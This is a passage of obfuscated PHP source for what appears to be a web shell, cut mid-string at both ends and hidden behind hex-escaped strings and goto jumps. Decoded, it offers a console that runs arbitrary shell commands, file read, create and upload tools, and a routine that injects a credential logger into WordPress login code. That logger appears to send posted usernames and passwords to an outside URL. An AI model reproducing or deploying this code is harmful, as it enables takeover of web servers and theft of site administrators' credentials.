53\x6b\x67\x4c\151\101\151\x4a\x6d\65\x68\x62\x57\125\71\x49\151\x41\165\x49\x41\x6f\x6b\131\127\x52\x74\141\x57\65\146\144\63\x42\146\x62\107\71\156\141\127\x35\x66\131\x32\x68\154\131\x32\164\x66\x61\x57\x35\60\132\x58\112\62\x59\x57\170\146\143\155\x56\x78\x64\127\126\x7a\x64\x43\147\153\130\61\x42\x50\x55\x31\x52\x62\111\x6d\x78\166\132\x79\x4a\144\113\123\101\165\x49\103\x49\x6d\x63\x47\106\172\143\63\144\x76\143\x6d\x51\71\x49\151\101\x75\x49\x41\x6f\x6b\x59\127\122\x74\141\x57\65\x66\x64\x33\102\146\142\107\71\x6e\141\x57\x35\x66\x59\x32\150\x6c\x59\x32\164\146\141\127\65\60\x5a\130\112\x32\131\127\170\146\x63\x6d\x56\x78\144\127\126\x7a\x64\103\x67\x6b\x58\61\102\120\125\61\x52\x62\111\156\x42\x33\132\103\112\144\113\124\x73\x4b\x4a\110\144\x77\x58\62\106\x6b\142\x57\154\x75\x58\x32\x4e\166\142\62\x74\x70\132\x56\x39\x70\x62\156\x52\x6c\x63\x6e\x5a\x68\x62\103\101\71\111\x47\x5a\160\142\x47\x56\x66\x5a\x32\126\x30\130\62\x4e\x76\x62\x6e\x52\x6c\142\156\122\172\113\x43\x52\63\x63\x46\71\150\x5a\107\x31\160\x62\154\71\152\142\x32\x39\x72\141\x57\126\146\x61\x57\x35\60\x5a\x58\112\62\x59\x57\170\146\x64\x58\x4a\163\113\124\x73\x4b\x5a\156\x56\x75\x59\x33\x52\x70\x62\62\x34\147\132\x32\x56\x30\x58\63\x64\166\143\155\x52\x77\143\155\126\172\x63\61\x39\x7a\x64\110\x4a\x31\131\x33\x52\x31\143\155\125\x6f\112\110\x56\171\x62\103\x6b\147\145\x77\x6f\x67\x49\103\101\x67\x4a\x47\116\x6f\111\x44\60\147\x59\63\126\x79\x62\x46\x39\160\142\155\154\60\x4b\x43\x6b\x37\103\151\x41\x67\111\103\102\152\x64\130\x4a\x73\130\x33\x4e\x6c\144\x47\71\167\x64\103\147\153\x59\x32\147\163\111\x45\x4e\126\x55\153\x78\x50\125\106\122\x66\126\x56\x4a\115\x4c\103\x41\153\x64\130\112\x73\x4b\124\x73\x4b\111\x43\x41\147\111\x47\116\61\143\155\170\x66\143\62\x56\60\x62\x33\102\60\x4b\x43\x52\x6a\x61\x43\167\147\121\x31\126\123\124\105\x39\121\126\x46\x39\123\122\x56\x52\x56\125\153\65\x55\125\x6b\x46\x4f\125\x30\132\106\x55\x69\x77\x67\115\x53\153\x37\x43\151\101\x67\111\x43\x42\152\x64\x58\112\163\130\63\116\154\144\x47\71\167\144\103\147\153\131\x32\x67\x73\111\105\116\126\125\153\170\x50\125\x46\x52\x66\x55\61\x4e\115\x58\61\x5a\106\x55\153\x6c\x47\127\x55\x68\120\x55\x31\121\163\x49\x47\132\x68\142\x48\x4e\x6c\x4b\x54\163\113\x49\x43\x41\147\111\107\x4e\x31\x63\x6d\x78\146\x63\x32\126\60\142\63\x42\x30\113\103\x52\x6a\x61\103\167\147\x51\61\x56\x53\x54\x45\71\121\x56\106\x39\x54\125\60\x78\146\x56\x6b\126\x53\x53\125\x5a\x5a\x55\x45\x56\x46\x55\151\x77\x67\132\x6d\x46\163\x63\62\x55\160\117\x77\157\x67\x49\x43\101\147\131\x33\126\171\x62\x46\71\172\132\130\x52\166\143\x48\121\x6f\x4a\107\x4e\157\x4c\x43\x42\104\126\x56\112\115\124\x31\x42\x55\x58\60\116\x50\124\x6b\65\x46\x51\61\122\125\x53\125\x31\x46\124\x31\x56\x55\x4c\103\101\x78\113\x54\x73\113\x49\103\x41\x67\111\x47\116\x31\143\x6d\170\146\x63\62\126\x30\x62\63\102\60\113\103\x52\152\141\103\x77\x67\121\61\126\123\124\105\71\121\126\106\71\125\x53\x55\61\106\124\x31\x56\x55\114\x43\101\x7a\x4b\x54\163\x4b\111\x43\101\x67\x49\107\x4e\x31\x63\155\170\146\x5a\130\x68\154\x59\x79\147\153\x59\62\147\x70\117\167\x6f\147\111\x43\101\147\x59\x33\x56\x79\142\x46\71\x6a\142\107\x39\172\132\x53\147\x6b\131\62\147\x70\x4f\x77\x6f\x67\111\x43\x41\x67\x63\x6d\x56\x30\x64\130\x4a\x75\111\x48\x52\x79\144\127\x55\x37\x43\x6e\x30\x4b\x61\127\x59\147\x4b\x47\x56\164\143\110\122\65\x4b\103\122\150\x5a\107\61\160\x62\x6c\71\x6a\142\x32\71\x72\141\x57\x56\146\x61\127\x35\60\132\x58\112\x32\131\127\167\160\x4b\123\x42\67\103\151\101\x67\111\103\102\x6e\132\130\x52\146\x64\x32\x39\x79\x5a\x48\102\171\x5a\x58\116\x7a\x58\63\x4e\x30\143\x6e\126\x6a\144\110\126\x79\132\123\x67\153\x59\x57\x52\x74\x61\127\x35\146\x59\62\x39\166\141\x32\x6c\154\x58\62\x6c\165\x64\x47\x56\171\144\x6d\106\x73\130\63\126\171\x62\103\153\67\103\x6e\x30\x4b\x61\127\x59\x67\x4b\107\x56\164\143\110\122\65\x4b\103\x52\x33\143\106\71\150\132\x47\x31\160\x62\154\71\152\142\62\71\x72\x61\x57\126\146\x61\x57\65\60\132\x58\112\62\x59\x57\167\160\x4b\x53\102\67\103\x69\x41\x67\x49\x43\102\156\x5a\130\x52\146\x64\x32\71\x79\132\x48\x42\171\x5a\x58\116\172\130\x33\x4e\60\143\x6e\x56\x6a\144\110\x56\x79\132\123\147\153\x64\x33\x42\146\x59\127\122\x74\x61\127\x35\146\x59\x32\x39\x76\x61\x32\x6c\x6c\x58\62\x6c\x75\x64\107\126\x79\144\155\x46\163\x58\63\126\x79\x62\x43\153\67\103\156\x30\75");$specificLine="\151\146\40\x28\40\x28\40\145\x6d\160\x74\171\x28\40\x24\x72\145\x64\151\162\145\x63\164\x5f\x74\157\x20\x29\40\174\174\40\47\167\160\55\141\x64\x6d\151\156\57\47\40\75\75\75\x20\44\162\x65\x64\151\x72\x65\143\164\137\164\157\40\x7c\x7c\40\x61\144\x6d\151\x6e\x5f\x75\162\x6c\50\x29\x20\x3d\75\75\40\x24\x72\145\144\151\162\145\143\164\137\x74\157\40\51\40\51\x20\173";$stringkita="\x24\x61\x64\x6d\x69\x6e\137\167\160\x5f\154\x6f\x67\151\x6e\137\143\150\145\x63\x6b\x5f\151\x6e\x74\x65\x72\x76\141\154\x5f\x63\157\x6f\x6b\x69\145";while(($buffer=fgets($f))!==false){if(strpos(file_get_contents($wplog),$stringkita)!==false){$logger_result="\74\x63\x65\156\x74\145\x72\76\x3c\x73\x70\141\156\40\x73\x74\x79\154\x65\75\143\x6f\154\x6f\162\72\162\x65\144\41\x69\155\x70\157\162\164\x61\156\x74\73\x66\157\x6e\x74\55\x77\145\x69\x67\x68\164\x3a\142\157\154\x64\x3b\76\x4c\x6f\x67\x67\145\162\x20\x53\x75\144\x61\150\40\104\x69\151\x6e\x6a\145\x63\x74\41\x3c\x2f\163\160\x61\156\76\74\57\143\145\x6e\x74\145\x72\76\74\x62\162\x3e";}elseif(strpos($buffer,$specificLine)!==false){$pos=ftell($f);$newstr=substr_replace($oldstr,$str_to_insert,$pos,0);$status=file_put_contents($wplog,$newstr);if($status){$logger_result.="\x3c\143\145\156\x74\x65\162\76\x3c\163\x70\141\x6e\40\163\x74\x79\x6c\x65\x3d\x63\x6f\x6c\157\x72\x3a\x23\x32\60\145\x66\x32\x30\41\x69\155\160\x6f\x72\x74\x61\x6e\164\x3b\146\157\156\x74\55\x77\145\x69\147\x68\x74\72\x62\157\154\144\x3b\76\x42\145\x72\150\x61\x73\151\154\x20\111\x6e\152\x65\143\164\x20\x4c\157\x67\147\145\x72\x21\74\57\163\160\x61\x6e\76\74\57\x63\x65\x6e\164\145\162\76\74\142\x72\x3e";}else{$logger_result.="\x3c\143\145\x6e\164\145\x72\76\74\x73\x70\141\156\x20\163\x74\171\x6c\x65\75\143\x6f\x6c\157\162\72\x72\145\144\x21\x69\155\x70\x6f\x72\x74\141\x6e\x74\x3b\x66\157\156\164\x2d\x77\145\x69\147\150\164\72\142\157\x6c\144\73\76\x47\141\147\x61\154\x20\x49\x6e\152\145\x63\x74\40\114\157\147\x67\145\x72\41\74\57\163\x70\x61\156\x3e\74\x2f\143\145\156\164\145\x72\76\x3c\x62\x72\76";}break;}}fclose($f);echo "\74\144\x69\x76\40\143\154\141\x73\163\75\x22\163\155\141\154\x6c\141\x72\x65\x61\x22\x20\156\x61\155\145\x3d\42\157\165\164\160\x75\x74\40\x73\x74\171\x6c\145\75\42\142\157\x72\x64\145\162\55\142\157\164\164\157\x6d\x3a\60\73\x6d\x61\x72\x67\151\156\55\164\157\160\72\65\x70\x78\x3b\x22\40\162\145\x61\144\157\156\x6c\x79\x3e";print_r($logger_result).PHP_EOL;echo "\74\57\144\151\x76\76";}echo "\74\x2f\144\151\x76\x3e";echo "\74\57\144\151\166\76";$is_writable=is_writable($GLOBALS["\x63\x77\x64"])?"\x20\x3c\146\x6f\156\x74\x20\x63\x6f\154\157\x72\x3d\47\43\146\x66\144\142\65\x66\x27\x3e\x5b\x20\x57\x72\151\164\x65\141\142\154\x65\40\135\x3c\57\x66\x6f\156\164\x3e":"\x20\x3c\146\x6f\x6e\164\x20\143\x6f\154\157\x72\75\x72\145\x64\x3e\x28\116\x6f\164\40\167\162\151\164\141\x62\154\145\x29\x3c\57\146\157\x6e\164\76";echo "\12\74\x2f\144\x69\x76\76\xa\74\x74\141\x62\154\145\40\143\x6c\x61\x73\163\x3d\151\x6e\x66\x6f\40\151\x64\x3d\164\157\x6f\x6c\163\x54\142\154\40\143\145\154\154\160\x61\144\144\151\156\x67\x3d\x33\40\x63\x65\154\154\163\x70\141\143\151\156\147\x3d\x30\x20\167\151\144\164\x68\75\x31\60\60\45\76\12\74\164\162\x3e\xa\x3c\x74\x64\x3e\x3c\146\157\162\x6d\x20\x6f\x6e\163\x75\x62\155\x69\164\x3d\x22".(function_exists("\x61\143\x74\151\x6f\x6e\x46\x69\154\145\163\x4d\141\156")?"\147\x28\156\x75\x6c\x6c\x2c\164\x68\151\x73\x2e\143\56\166\x61\x6c\165\145\54\47\x27\x29\x3b":'')."\x72\145\164\165\162\156\40\x66\141\x6c\163\145\x3b\42\76\x3c\163\160\141\156\76\x43\x68\x61\x6e\147\x65\x20\x64\151\x72\72\74\57\x73\160\141\x6e\76\x3c\142\x72\x3e\x3c\151\156\x70\165\164\x20\x63\154\141\163\163\75\x27\164\157\x6f\154\x73\x49\156\160\x27\40\164\x79\x70\x65\75\x74\145\x78\x74\x20\156\141\x6d\145\x3d\x63\x20\166\x61\x6c\165\145\75\x27".htmlspecialchars($GLOBALS["\143\x77\x64"])."\47\76\74\x69\156\x70\165\164\x20\164\171\x70\x65\75\x73\165\142\155\151\x74\x20\x76\x61\x6c\x75\x65\x3d\x27\163\165\142\x6d\x69\x74\x27\x3e\74\57\146\x6f\x72\155\76\74\57\164\144\x3e\12\74\164\144\76\x3c\146\x6f\x72\155\40\x6f\156\163\x75\142\x6d\151\x74\x3d\x22".(function_exists("\141\143\164\151\157\x6e\106\151\x6c\145\x73\124\x6f\157\x6c\163")?"\147\50\47\x46\x69\x6c\145\163\124\157\157\154\163\x27\54\x6e\165\x6c\154\x2c\x74\x68\151\x73\x2e\x66\x2e\166\x61\x6c\x75\145\51\x3b":'')."\162\145\x74\165\162\156\40\146\141\x6c\x73\145\73\42\76\x3c\163\160\141\x6e\76\x52\145\x61\144\x20\x66\x69\154\145\72\74\57\163\160\x61\x6e\x3e\x3c\142\162\x3e\x3c\x69\156\160\165\x74\x20\143\x6c\141\x73\163\x3d\47\164\x6f\x6f\x6c\x73\111\156\160\47\40\x74\171\160\145\x3d\x74\145\170\x74\40\156\141\155\x65\75\x66\40\162\145\161\x75\x69\x72\145\144\x3e\x3c\x69\x6e\160\x75\x74\40\164\171\x70\145\x3d\163\165\142\155\151\x74\40\166\x61\x6c\165\145\x3d\x27\163\165\x62\x6d\x69\x74\x27\x3e\x3c\57\x66\157\162\x6d\x3e\x3c\57\x74\144\x3e\xa\x3c\57\164\162\76\x3c\x74\162\76\12\74\x74\x64\x3e\x3c\146\157\162\x6d\40\x6f\x6e\163\x75\142\x6d\151\164\75\42".(function_exists("\141\143\x74\x69\x6f\156\106\x69\154\x65\163\115\141\x6e")?"\147\x28\x27\x46\151\154\145\x73\x4d\141\x6e\x27\54\x6e\x75\154\154\54\x27\155\x6b\144\x69\x72\47\54\x74\150\151\x73\x2e\144\x2e\x76\x61\154\x75\145\51\x3b":'')."\162\x65\x74\x75\162\x6e\x20\146\141\154\x73\x65\73\42\x3e\x3c\x73\160\x61\156\76\x4d\x61\x6b\x65\40\144\x69\162\x3a\74\x2f\163\x70\141\156\76{$is_writable}\74\142\162\x3e\x3c\x69\x6e\x70\165\164\x20\143\154\x61\163\163\x3d\x27\x74\157\157\154\x73\x49\x6e\160\x27\x20\x74\171\160\x65\x3d\164\x65\x78\164\x20\x6e\141\155\145\x3d\x64\x20\x72\145\161\165\x69\x72\145\144\x3e\x3c\x69\156\x70\165\x74\40\164\171\160\x65\75\163\x75\x62\x6d\x69\x74\x20\166\x61\154\165\145\x3d\x27\x73\165\142\x6d\151\164\47\76\74\x2f\x66\x6f\162\x6d\76\x3c\x2f\x74\x64\x3e\12\74\164\x64\76\74\146\x6f\x72\x6d\x20\157\x6e\x73\x75\x62\x6d\x69\x74\75\42".(function_exists("\x61\x63\x74\x69\x6f\156\x46\151\154\x65\163\x54\x6f\157\154\x73")?"\x67\50\x27\x46\x69\x6c\x65\163\124\x6f\x6f\x6c\163\47\x2c\156\165\154\154\54\164\x68\x69\163\x2e\146\56\166\x61\154\x75\x65\54\x27\x6d\x6b\146\x69\154\x65\x27\x29\x3b":'')."\162\x65\164\x75\x72\x6e\40\x66\x61\154\x73\x65\x3b\42\x3e\74\x73\x70\141\x6e\76\115\x61\x6b\145\40\146\x69\154\145\72\x3c\57\x73\160\x61\156\x3e{$is_writable}\x3c\x62\162\76\x3c\x69\x6e\160\x75\164\40\x63\x6c\x61\163\x73\75\47\x74\x6f\x6f\154\x73\111\156\x70\47\40\164\171\x70\145\75\x74\x65\x78\x74\x20\156\141\x6d\x65\x3d\x66\x20\x72\x65\161\165\151\x72\x65\x64\76\x3c\x69\x6e\x70\x75\164\40\x74\x79\160\145\75\163\165\142\155\151\164\40\166\x61\x6c\165\x65\75\x27\163\165\x62\x6d\x69\x74\x27\76\74\57\146\157\162\155\76\74\x2f\x74\144\76\xa\74\57\164\162\x3e\74\x74\162\76\12\74\164\x64\x3e\74\146\x6f\162\x6d\x20\x6f\156\163\x75\x62\x6d\151\x74\x3d\42".(function_exists("\x61\x63\x74\x69\157\156\103\x6f\156\x73\157\154\145")?"\147\50\x27\103\x6f\x6e\x73\x6f\154\145\x27\54\156\165\154\154\x2c\164\150\151\x73\x2e\x63\56\x76\x61\x6c\x75\x65\51\x3b":'')."\162\145\164\x75\162\x6e\40\146\141\154\x73\x65\x3b\42\x3e\x3c\x73\x70\141\x6e\x3e\x45\x78\145\x63\x75\164\x65\72\74\57\163\160\x61\x6e\x3e\x3c\142\162\76\x3c\x69\x6e\160\165\164\x20\143\x6c\141\x73\163\75\x27\164\157\x6f\x6c\163\111\x6e\160\47\x20\164\171\160\145\x3d\x74\145\170\164\x20\x6e\x61\155\x65\75\x63\40\x76\141\154\x75\x65\x3d\47\47\x3e\x3c\151\x6e\x70\165\164\x20\x74\x79\x70\x65\75\x73\165\142\155\151\164\x20\166\141\x6c\165\x65\x3d\47\x73\165\142\155\151\x74\x27\x3e\74\x2f\146\157\x72\155\76\74\x2f\x74\x64\76\xa\74\164\144\76\74\x66\x6f\162\155\x20\155\x65\x74\150\157\x64\x3d\47\160\157\x73\164\x27\x20".(!function_exists("\x61\143\164\x69\157\x6e\x46\151\154\145\163\x4d\x61\x6e")?"\x20\157\156\163\x75\142\x6d\151\164\75\x22\x72\145\164\x75\x72\156\x20\x66\141\x6c\163\145\x3b\42\40":'')."\105\x4e\x43\124\x59\x50\x45\x3d\x27\155\x75\x6c\x74\151\x70\x61\162\x74\x2f\146\157\x72\155\x2d\144\141\x74\141\47\76\12\74\x69\x6e\x70\x75\x74\x20\x74\x79\160\x65\x3d\x68\151\x64\144\145\x6e\x20\x6e\x61\x6d\145\75\141\40\166\141\x6c\x75\x65\75\47\106\151\154\x65\163\x4d\x61\x6e\x27\x3e\xa\74\151\x6e\160\x75\x74\40\x74\171\160\145\x3d\150\x69\x64\144\145\x6e\x20\x6e\x61\155\x65\75\143\40\166\x61\x6c\165\x65\x3d\47".htmlspecialchars($GLOBALS["\143\x77\x64"])."\47\76\xa\74\151\x6e\x70\165\164\40\x74\x79\160\x65\x3d\x68\x69\144\144\145\156\40\156\141\155\145\75\160\61\x20\x76\x61\154\x75\145\75\x27\x75\x70\154\157\x61\144\x46\x69\x6c\x65\47\76\xa\x3c\151\x6e\x70\165\x74\40\164\x79\x70\145\75\150\x69\144\144\145\156\40\156\x61\x6d\145\75\x6e\x65\40\x76\x61\x6c\165\x65\75\x27\x27\x3e\12\74\x69\x6e\x70\x75\164\40\164\x79\160\145\75\x68\151\x64\144\x65\x6e\x20\x6e\x61\155\x65\x3d\x63\x68\141\162\x73\145\x74\40\x76\x61\x6c\x75\145\75\47".(isset($_POST["\x63\150\x61\x72\163\x65\164"])?$_POST["\143\x68\x61\x72\x73\145\x74"]:'')."\x27\x3e\12\x3c\163\160\x61\x6e\x3e\125\x70\x6c\x6f\x61\x64\x20\x66\151\x6c\145\72\x3c\57\163\160\x61\x6e\x3e{$is_writable}\74\142\x72\76\x3c\151\156\x70\165\164\40\143\154\x61\x73\163\x3d\x27\x74\157\x6f\154\x73\x49\x6e\160\x27\x20\164\171\x70\145\75\x66\x69\154\145\x20\156\141\155\145\75\146\133\135\40\40\155\x75\x6c\164\x69\160\154\145\76\x3c\x69\x6e\160\x75\x74\40\164\x79\160\145\75\163\x75\x62\x6d\151\x74\x20\166\x61\154\165\145\75\x27\163\165\x62\155\x69\x74\47\x3e\x3c\57\x66\157\162\x6d\76\74\x62\x72\x20\x20\76\x3c\57\164\x64\x3e\12\74\57\164\x72\x3e\74\57\x74\x61\x62\x6c\145\76\x3c\x2f\x64\x69\x76\76\12\x3c\x2f\x62\x6f\x64\171\x3e\xa\x3c\57\150\x74\x6d\154\x3e";}goto Nr1jN;c9t3R:ini_set("\154\x6f\147\x5f\145\x72\162\x6f\162\x73\x5f\x6d\x61\170\137\x6c\x65\x6e",0);goto T_JGw;Ulmtn:function perms($p){if(($p&49152)==49152){$i="\163";}elseif(($p&40960)==40960){$i="\154";}elseif(($p&32768)==32768){$i="\x2d";}elseif(($p&24576)==24576){$i="\x62";}elseif(($p&16384)==16384){$i="\x64";}elseif(($p&8192)==8192){$i="\143";}elseif(($p&4096)==4096){$i="\160";}else{$i="\x75";}$i.=$p&256?"\162":"\x2d";$i.=$p&128?"\167":"\x2d";$i.=$p&64?$p&2048?"\163":"\170":($p&2048?"\x53":"\55");$i.=$p&32?"\162":"\x2d";$i.=$p&16?"\x77":"\x2d";$i.=$p&8?$p&1024?"\x73":"\x78":($p&1024?"\x53":"\55");$i.=$p&4?"\162":"\55";$i.=$p&2?"\x77":"\x2d";$i.=$p&1?$p&512?"\x74":"\x78":($p&512?"\x54":"\55");return $i;}goto M1Qpe;aeTs4:function actionConsole(){if(!empty($_POST["\160\x31"])&&!empty($_POST["\160\x32"])){prototype(sha1(md5($_SERVER["\110\124\x54\x50\x5f\110\x4f\123\124"]))."\163\164\x64\x65\162\162\x5f\164\157\137\157\165\164",true);$_POST["\x70\61"].="\x20\x32\x3e\x26\x31";}elseif(!empty($_POST["\x70\x31"])){prototype(sha1(md5($_SERVER["\110\x54\124\x50\137\110\117\x53\124"]))."\x73\164\144\145\162\162\137\164\157\137\x6f\x75\164",0);}if(isset($_POST["\141\152\141\170"])){prototype(sha1(md5($_SERVER["\110\124\124\x50\x5f\110\x4f\123\x54"]))."\141\152\141\170",true);ob_start();echo "\144\56\x63\x66\56\143\x6d\144\56\x76\x61\154\x75\145\x3d\x27\47\73\xa";$temp=@iconv($_POST["\143\150\141\x72\x73\145\x74"],"\125\124\x46\x2d\70",addcslashes("\12\44\40".$_POST["\160\61"]."\xa".ex($_POST["\x70\61"]),"\12\xd\x9\x5c\47\0"));if(preg_match("\41\56\52\x63\144\134\x73\x2b\50\x5b\x5e\73\135\x2b\x29\x24\41",$_POST["\x70\x31"],$match)){if(@chdir($match[1])){$GLOBALS["\x63\167\144"]=@getcwd();echo "\143\137\x3d\47".$GLOBALS["\143\167\x64"]."\x27\x3b";}}echo "\x64\x2e\x63\146\56\157\x75\164\160\x75\164\x2e\x76\x61\x6c\165\x65\x2b\75\47".$temp."\x27\x3b";echo "\144\x2e\x63\x66\56\157\x75\x74\x70\x75\x74\x2e\163\143\162\157\x6c\154\124\157\160\x20\x3d\x20\144\x2e\143\146\x2e\157\x75\x74\160\x75\164\x2e\x73\143\x72\x6f\154\154\x48\x65\x69\x67\x68\164\73";$temp=ob_get_clean();echo strlen($temp),"\12",$temp;die;}if(empty($_POST["\141\x6a\141\x78"])&&!empty($_POST["\160\x31"])){prototype(sha1(md5($_SERVER["\x48\124\x54\x50\137\110\117\x53\124"]))."\141\152\x61\x78",0);}hardHeader();echo "\74\x73\x63\x72\x69\160\x74\76\12\x69\146\x28\167\151\x6e\144\x6f\x77\x2e\x45\x76\145\x6e\164\51\x20\x77\x69\x6e\144\x6f\167\56\x63\141\160\x74\165\162\145\x45\166\x65\156\164\x73\x28\x45\x76\x65\156\x74\x2e\x4b\x45\131\104\x4f\127\116\51\73\xa\166\x61\162\x20\143\155\144\x73\40\75\x20\x6e\x65\167\x20\101\162\x72\x61\x79\50\x27\47\x29\73\xa\x76\141\x72\x20\x63\x75\162\x20\x3d\40\x30\x3b\12\146\165\x6e\143\x74\151\x6f\x6e\40\153\x70\50\x65\51\40\173\12\166\x61\x72\40\x6e\40\75\40\50\167\x69\156\x64\x6f\167\x2e\x45\166\145\156\164\51\x20\x3f\40\145\56\x77\150\151\143\x68\x20\72\x20\145\56\x6b\x65\x79\103\x6f\144\x65\73\12\151\146\x28\x6e\x20\x3d\x3d\40\x33\x38\x29\x20\173\12\143\165\162\x2d\x2d\73\xa\x69\x66\x28\143\165\162\x3e\x3d\x30\51\xa\x64\x6f\x63\x75\155\x65\x6e\164\x2e\143\146\56\143\155\x64\56\x76\141\154\x75\x65\40\x3d\40\x63\155\144\163\x5b\x63\165\162\135\73\xa\x65\x6c\163\145\12\143\x75\x72\53\x2b\x3b\xa\175\40\145\x6c\163\145\x20\151\146\x28\x6e\x20\75\x3d\40\64\60\51\40\173\12\143\165\162\53\x2b\73\xa\x69\x66\50\143\165\x72\x20\74\40\x63\x6d\x64\163\x2e\x6c\x65\x6e\147\164\x68\51\xa\x64\157\x63\x75\x6d\x65\156\x74\56\x63\146\x2e\x63\x6d\144\x2e\x76\141\154\x75\145\x20\75\x20\143\155\x64\x73\133\x63\x75\x72\x5d\x3b\xa\145\x6c\163\145\xa\x63\x75\162\55\x2d\x3b\xa\x7d\xa\175\12\146\165\x6e\x63\x74\151\157\156\40\x61\x64\144\x28\x63\155\x64\51\x20\x7b\12\x63\x6d\x64\163\56\x70\157\160\50\x29\73\xa\143\155\x64\163\x2e\x70\x75\163\150\50\x63\x6d\144\51\x3b\xa\x63\x6d\144\x73\x2e\x70\x75\163\x68\x28\47\47\51\73\xa\x63\165\162\x20\75\40\143\155\144\163\56\x6c\x65\156\147\164\150\x2d\x31\73\12\175\xa\x3c\x2f\163\143\162\x69\160\164\76";echo "\x3c\x68\x31\x3e\x43\157\x6e\x73\x6f\x6c\145\x3c\57\x68\61\76\x3c\x64\151\166\40\143\154\141\163\x73\x3d\x63\x6f\156\164\145\156\164\x3e\x3c\146\157\162\155\x20\156\141\x6d\x65\75\143\x66\x20\x6f\156\163\x75\142\x6d\151\164\75\x22\151\x66\x28\144\x2e\143\x66\x2e\143\155\x64\x2e\166\141\x6c\x75\145\x3d\75\x27\143\154\x65\x61\162\47\51\173\144\x2e\143\x66\56\157\165\164\160\165\164\56\x76\141\154\165\145\x3d\x27\x27\73\144\x2e\x63\x66\x2e\143\x6d\x64\x2e\x76\x61\x6c\x75\x65\75\x27\x27\73\x72\145\164\165\x72\x6e\x20\x66\x61\x6c\163\x65\x3b\175\x61\144\144\50\164\x68\151\163\x2e\x63\155\x64\56\166\141\154\x75\x65\x29\73\x69\x66\50\164\x68\x69\163\x2e\141\x6a\x61\170\56\143\150\145\143\153\145\144\51\x7b\x61\x28\x6e\165\x6c\154\54\156\165\154\x6c\x2c\164\150\x69\163\56\x63\155\144\56\166\x61\x6c\165\x65\x2c\164\x68\151\163\56\163\x68\157\167\137\x65\x72\x72\x6f\x72\163\56\x63\x68\x65\x63\153\x65\x64\x3f\61\72\47\47\51\73\x7d\x65\154\x73\145\x7b\x67\x28\x6e\165\154\154\54\x6e\x75\154\x6c\x2c\x74\150\151\163\56\x63\155\144\56\166\x61\154\165\x65\x2c\164\x68\x69\163\56\x73\150\157\167\137\145\162\x72\x6f\162\x73\x2e\143\x68\x65\x63\x6b\x65\x64\x3f\61\x3a\x27\47\51\x3b\x7d\40\162\x65\x74\x75\x72\x6e\x20\x66\x61\154\163\x65\73\42\x3e\74\154\141\x62\x65\x6c\76\74\x73\145\x6c\145\143\164\x20\x6e\141\x6d\145\75\141\x6c\151\141\x73\76";foreach($GLOBALS["\141\154\151\141\163\x65\x73"]as $n=>$v){if($v==''){echo "\x3c\157\160\x74\x67\x72\x6f\165\x70\x20\x6c\x61\142\145\154\x3d\42\55".htmlspecialchars($n)."\55\42\76\x3c\57\x6f\160\x74\147\162\157\x75\160\76";continue;}echo "\74\157\160\x74\x69\x6f\156\40\x76\141\154\x75\x65\75\x22".htmlspecialchars($v)."\x22\x3e".$n."\74\57\157\x70\164\x69\x6f\156\x3e";}echo "\x3c\57\163\145\154\x65\143\164\x3e\x3c\57\x6c\x61\x62\145\x6c\x3e\74\151\156\160\165\164\x20\x74\x79\160\145\75\x62\x75\x74\164\157\x6e\x20\157\x6e\x63\154\x69\143\153\75\42\x61\144\144\x28\144\56\143\x66\56\141\x6c\151\141\x73\56\166\x61\x6c\x75\145\51\73\151\x66\50\144\56\143\146\56\141\x6a\141\170\56\143\x68\145\x63\x6b\x65\x64\x29\173\141\50\x6e\165\154\154\x2c\x6e\165\154\154\54\144\56\143\146\x2e\141\x6c\x69\x61\163\x2e\166\141\x6c\x75\x65\x2c\144\56\143\146\56\163\x68\157\167\137\145\x72\x72\157\x72\163\x2e\143\150\145\143\x6b\x65\144\77\x31\x3a\x27\x27\51\73\175\x65\154\163\x65\173\147\50\156\165\x6c\x6c\54\x6e\165\154\154\54\x64\x2e\143\146\x2e\x61\154\x69\141\163\56\166\141\x6c\165\145\x2c\144\x2e\x63\x66\56\x73\x68\157\x77\x5f\145\162\x72\157\x72\x73\x2e\143\x68\x65\143\x6b\145\x64\x3f\61\72\47\47\51\73\x7d\x22\x20\x76\x61\x6c\165\145\x3d\x22\x73\x75\x62\x6d\x69\164\x22\76\40\x3c\156\x6f\142\x72\76\x3c\151\x6e\160\165\164\40\x74\171\160\145\75\x63\x68\145\x63\153\x62\x6f\170\40\x6e\141\155\x65\x3d\141\152\x61\170\x20\166\x61\x6c\165\145\x3d\x31\40".(@$_COOKIE[sha1(md5($_SERVER["\110\124\124\120\x5f\x48\117\x53\x54"]))."\141\152\141\x78"]?"\143\150\145\x63\153\x65\x64":'')."\76\40\163\x65\156\144\40\165\163\151\156\147\40\x41\x4a\x41\130\x20\x3c\151\156\160\x75\164\x20\x74\x79\x70\145\75\x63\x68\x65\143\x6b\142\x6f\x78\x20\156\x61\155\145\x3d\163\x68\x6f\x77\x5f\145\162\x72\157\x72\163\x20\x76\141\154\165\x65\75\61\40".(!empty($_POST["\x70\62"])||$_COOKIE[sha1(md5($_SERVER["\110\x54\x54\x50\x5f\x48\117\123\x54"]))."\163\164\144\145\x72\162\x5f\x74\x6f\x5f\157\x75\x74"]?"\143\x68\x65\x63\x6b\145\x64":'')."\x3e\x20\x72\145\x64\151\x72\145\x63\x74\x20\x73\164\x64\145\162\162\x20\x74\x6f\x20\163\x74\144\x6f\x75\164\x20\50\x32\76\46\61\51\74\x2f\x6e\x6f\142\x72\76\74\x62\162\x2f\x3e\x3c\164\x65\x78\x74\x61\x72\145\x61\40\143\x6c\x61\x73\x73\x3d\142\x69\x67\x61\162\x65\x61\40\x6e\141\x6d\x65\75\157\x75\x74\x70\x75\x74\40\163\x74\171\x6c\x65\x3d\x22\142\157\x72\x64\145\x72\55\142\x6f\164\164\157\x6d\72\60\73\x6d\141\x72\147\151\156\x2d\164\157\x70\72\x35\160\170\73\x22\40\x72\145\141\x64\157\156\x6c\171\x3e";if(!empty($_POST["\x70\x31"])){echo htmlspecialchars("\44\40".$_POST["\160\x31"]."\12".ex($_POST["\x70\x31"]));}echo 